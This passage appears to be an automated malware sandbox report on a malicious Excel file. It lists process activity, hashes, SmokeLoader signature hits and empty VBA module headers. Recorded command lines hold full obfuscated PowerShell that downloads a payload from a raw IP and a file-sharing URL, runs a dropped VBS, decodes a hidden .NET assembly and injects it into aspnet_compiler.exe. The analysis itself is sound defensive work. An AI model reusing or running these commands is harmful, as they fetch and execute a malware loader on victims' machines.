@(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
                                                                                                                                                  Imagebase:0x13fdb0000
                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:17
                                                                                                                                                  Start time:12:21:55
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                  Imagebase:0x13fdd0000
                                                                                                                                                  File size:13'824 bytes
                                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:19
                                                                                                                                                  Start time:12:21:59
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
                                                                                                                                                  Imagebase:0x13fdb0000
                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:21
                                                                                                                                                  Start time:12:22:00
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
                                                                                                                                                  Imagebase:0x13fdb0000
                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:22
                                                                                                                                                  Start time:12:22:03
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.cmdline"
                                                                                                                                                  Imagebase:0x13f520000
                                                                                                                                                  File size:2'758'280 bytes
                                                                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:23
                                                                                                                                                  Start time:12:22:04
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES845C.tmp" "c:\Users\user\AppData\Local\Temp\mffkkngw\CSC9E50345C585C4EFF867E1FFD2050D1A6.TMP"
                                                                                                                                                  Imagebase:0x13f3b0000
                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:25
                                                                                                                                                  Start time:12:22:08
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
                                                                                                                                                  Imagebase:0xff2f0000
                                                                                                                                                  File size:168'960 bytes
                                                                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:26
                                                                                                                                                  Start time:12:22:08
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                  Imagebase:0x13fdb0000
                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:28
                                                                                                                                                  Start time:12:22:12
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
                                                                                                                                                  Imagebase:0x13fdb0000
                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:29
                                                                                                                                                  Start time:12:22:16
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                  File size:55'384 bytes
                                                                                                                                                  MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:30
                                                                                                                                                  Start time:12:22:16
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                  File size:55'384 bytes
                                                                                                                                                  MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:31
                                                                                                                                                  Start time:12:22:21
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                  Imagebase:0xff2f0000
                                                                                                                                                  File size:3'229'696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:34
                                                                                                                                                  Start time:12:22:36
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                                                                  Imagebase:0x2c0000
                                                                                                                                                  File size:55'384 bytes
                                                                                                                                                  MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000022.00000002.567719148.0000000000261000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:35
                                                                                                                                                  Start time:12:22:41
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\System32\taskeng.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:taskeng.exe {D690A31F-6F9A-4F5C-9D7D-F0EC28BCB101} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                                                                  Imagebase:0xff6a0000
                                                                                                                                                  File size:464'384 bytes
                                                                                                                                                  MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:36
                                                                                                                                                  Start time:12:22:42
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\vtjrhji
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\vtjrhji
                                                                                                                                                  Imagebase:0xf70000
                                                                                                                                                  File size:55'384 bytes
                                                                                                                                                  MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:38
                                                                                                                                                  Start time:12:22:43
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Imagebase:0xc70000
                                                                                                                                                  File size:2'972'672 bytes
                                                                                                                                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:39
                                                                                                                                                  Start time:12:22:45
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\explorer.exe
                                                                                                                                                  Imagebase:0xff2f0000
                                                                                                                                                  File size:3'229'696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:40
                                                                                                                                                  Start time:12:22:46
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Imagebase:0xc70000
                                                                                                                                                  File size:2'972'672 bytes
                                                                                                                                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:41
                                                                                                                                                  Start time:12:22:48
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Imagebase:0xc70000
                                                                                                                                                  File size:2'972'672 bytes
                                                                                                                                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:42
                                                                                                                                                  Start time:12:22:49
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\explorer.exe
                                                                                                                                                  Imagebase:0xff2f0000
                                                                                                                                                  File size:3'229'696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:43
                                                                                                                                                  Start time:12:22:51
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Imagebase:0xc70000
                                                                                                                                                  File size:2'972'672 bytes
                                                                                                                                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:45
                                                                                                                                                  Start time:12:22:52
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\explorer.exe
                                                                                                                                                  Imagebase:0xff2f0000
                                                                                                                                                  File size:3'229'696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:46
                                                                                                                                                  Start time:12:22:56
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  Imagebase:0xc70000
                                                                                                                                                  File size:2'972'672 bytes
                                                                                                                                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:false

                                                                                                                                                  Target ID:47
                                                                                                                                                  Start time:12:22:57
                                                                                                                                                  Start date:18/11/2024
                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\explorer.exe
                                                                                                                                                  Imagebase:0xff2f0000
                                                                                                                                                  File size:3'229'696 bytes
                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Has exited:false

                                                                                                                                                  Call Graph

                                                                                                                                                  • Entrypoint
                                                                                                                                                  • Decryption Function
                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  • Show Help
                                                                                                                                                  callgraph 1 Error: Graph is empty

                                                                                                                                                  Module: Sheet1

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Sheet1"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Module: Sheet2

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Sheet2"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Module: Sheet3

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "Sheet3"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

                                                                                                                                                  Attribute VB_Creatable = False

                                                                                                                                                  5

                                                                                                                                                  Attribute VB_PredeclaredId = True

                                                                                                                                                  6

                                                                                                                                                  Attribute VB_Exposed = True

                                                                                                                                                  7

                                                                                                                                                  Attribute VB_TemplateDerived = False

                                                                                                                                                  8

                                                                                                                                                  Attribute VB_Customizable = True

                                                                                                                                                  Module: ThisWorkbook

                                                                                                                                                  Declaration
                                                                                                                                                  LineContent
                                                                                                                                                  1

                                                                                                                                                  Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                  2

                                                                                                                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                  3

                                                                                                                                                  Attribute VB_GlobalNameSpace = False

                                                                                                                                                  4

